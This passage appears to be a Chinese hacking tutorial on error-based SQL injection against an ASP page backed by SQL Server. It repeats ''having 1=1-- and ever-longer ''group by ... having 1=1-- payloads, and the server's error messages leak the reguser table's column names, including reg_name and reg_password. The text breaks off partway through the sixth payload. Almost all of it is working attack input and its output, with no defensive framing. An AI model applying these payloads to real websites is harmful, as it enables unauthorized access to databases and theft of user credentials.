SQL构造语句暴字段 一、获得建立用户的表的名字和字段的名字;使用select语法的having子句。 *************************************************** ''having 1=1-- *************************************************** 返回结果: Microsoft OLE DB Provider for SQL Server 错误 ''80040e14'' 列 ''reguser.reg_id'' 在选择列表中无效,因为该列未包含在聚合函数中,并且没有 GROUP BY 子句。 /football/reguser/check.asp,行26 成果:知道了表的名字reguser和第一个字段的名字reguser.reg_id。
二、通过字段放到group by子句找到字段名。 1、 *************************************************** ''group by reguser.reg_id having 1=1-- *************************************************** 返回结果: Microsoft OLE DB Provider for SQL Server 错误 ''80040e14'' 列 ''reguser.reg_name'' 在选择列表中无效,因为该列既不包含在聚合函数中,也不包含在 GROUP BY 子句中。 /football/reguser/check.asp,行26 成果:得到了reguser.reg_name字段 2、 **************************************************** ''group by reguser.reg_id,reguser.reg_name having 1=1-- *************************************************** 返回结果: Microsoft OLE DB Provider for SQL Server 错误 ''80040e14'' 列 ''reguser.reg_password'' 在选择列表中无效,因为该列既不包含在聚合函数中,也不包含在 GROUP BY 子句中。 /football/reguser/check.asp,行26 成果:得到了reguser.reg_password字段 3、 *********************************************** ''group by reguser.reg_id,reguser.reg_name,reguser.reg_password having 1=1-- *********************************************** 返回结果: Microsoft OLE DB Provider for SQL Server 错误 ''80040e14'' 列 ''reguser.reg_relname'' 在选择列表中无效,因为该列既不包含在聚合函数中,也不包含在 GROUP BY 子句中。 /football/reguser/check.asp,行26 成果:得到了reguser.reg_relname字段 4、 ************************************************** ''group by reguser.reg_id,reguser.reg_name,reguser.reg_password,reguser.reg_relname having 1=1-- ************************************************** 返回结果: Microsoft OLE DB Provider for SQL Server 错误 ''80040e14'' 列 ''reguser.reg_regtime'' 在选择列表中无效,因为该列既不包含在聚合函数中,也不包含在 GROUP BY 子句中。 /football/reguser/check.asp,行26 成果:得到了reguser.reg_regtime字段 5、 ****************************************************** ''group by reguser.reg_id,reguser.reg_name,reguser.reg_password,reguser.reg_relname,reguser.reg_regtime having 1=1-- ****************************************************** 返回结果: Microsoft OLE DB Provider for SQL Server 错误 ''80040e14'' 列 ''reguser.reg_findme'' 在选择列表中无效,因为该列既不包含在聚合函数中,也不包含在 GROUP BY 子句中。 /football/reguser/check.asp,行26 成果:得到了reguser.reg_findme字段 6、 ****************************************************** ''group by reguser.reg_id,reguser.reg_name,reguser.reg_password,reguser.reg_relname,reguser.reg_reg